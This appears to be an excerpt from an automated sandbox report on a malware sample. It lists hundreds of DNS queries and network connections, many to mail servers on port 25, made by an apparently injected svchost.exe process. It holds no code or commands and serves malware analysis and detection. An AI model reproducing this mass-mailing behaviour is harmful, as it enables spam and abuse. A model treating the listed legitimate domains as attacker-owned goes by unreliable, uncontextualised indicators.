                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.204.160 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.74.161.133 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.226.70.66 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 37.59.243.164 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 154.81.136.239 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.163.45.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.89.126 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.30.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.183.62 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.134.13.210 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.239.38.21 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vdoherty.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftmobile.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.13 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.68.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.111.4.75 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.80.123.195 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.19.218.80 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.148.35 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: semuk.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.50.140 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.airmail.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.132.175.106 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.164.117.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nblewis.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amba-tc.si
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 141.193.213.20 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.54.214 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.92.170 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.98.236.253 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 75.2.70.75 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.pohlfood.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.86.6.113 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 136.243.147.81 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.42.191.38 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: angework.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.130.159 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 127.0.0.11 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 221.132.33.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.6.17 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 162.241.233.114 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.236.62.147 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.104.28.238 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cnti.krsn.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.71.55 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.219.178.104 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.224.212.222 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.41.152 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cyclad.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.fnw.us
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.38 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.177.67.59 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.165.223.27 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 207.180.198.201 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 68.71.135.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: listel.co.jp
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 89gospel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sidepath.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karila.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.197.142.173 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hyab.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zemarmot.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.15.134.44 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.49 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: thiessen.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.185.0.4 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: techtrans.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: calvinly.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.19.230.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kavram.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webavant.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.156.49 443
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.168.185.204 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.201.52.102 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.96.32.254 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 65.52.128.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.89.107.122 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.18.40.43 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.13 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.15 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.12 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: from30ty.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bigzz.by
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.246.117.171 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vonparis.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: envogen.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: x96.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kairel.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: linac.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: noblesse.be
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bossinst.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: redgiga.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.59.243.222 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-mould.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: toundo.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dbnet.at
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ktenergo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.220.211.163 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.76.70 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.157.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.129.138.60 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.216.241.100 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.216.107 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: midap.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smitko.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.128.23.153 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 80.82.115.227 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yhsll.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: anteph.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mikihan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ramkome.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wahw.com.au
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.178.189.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.227 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gbmfg.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: orlyhotel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 27.0.174.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.209.32.212 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.225.40.19 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.75.251.116 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pro-fa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.48.207 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.231.224 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: univi.it
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cutchie.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.230.155.43 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.64.163.50 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: grlawcc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 66.163.170.48 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: coxkitchensandbaths.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: invictus.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: holp-ai.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shittas.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bible.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: missnue.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: jsaps.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.126.211.112 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: haigh-me.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.243.77 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.49.23.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: canasil.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.195.90.46 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.167.255.150 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpmteam.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kevyt.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: awfraser.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: in1.smtp.messaginguser.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.186.238.101 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 109.71.54.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adventist.ro
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.129.97 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.232.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: isom.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.36.175.146 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ciicsc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akr.co.id
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shztm.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.124.249.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 15.204.18.132 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: metaforacom.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dhh.la.gov
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 31.177.80.70 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cbras.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atbauk.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.5.116.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hbfuels.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 142.250.27.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: atis-sk.ca
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.sbcglobal.yahoo.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tabbles.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cqdgroup.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.189.68 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 63.251.106.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.233.160.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.57 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ikulani.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cjborden.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 95.174.22.233 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lpver.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.151.30.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 199.34.228.78 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: web-york.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.172.94.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: beafin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: stopllc.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dzm.cz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.11.56.48 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: arowines.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rast.se
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fifa-ews.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hazmatt.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aba.org.eg
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wanoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shiner.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kustnara.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: msl-lock.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: apcotex.com
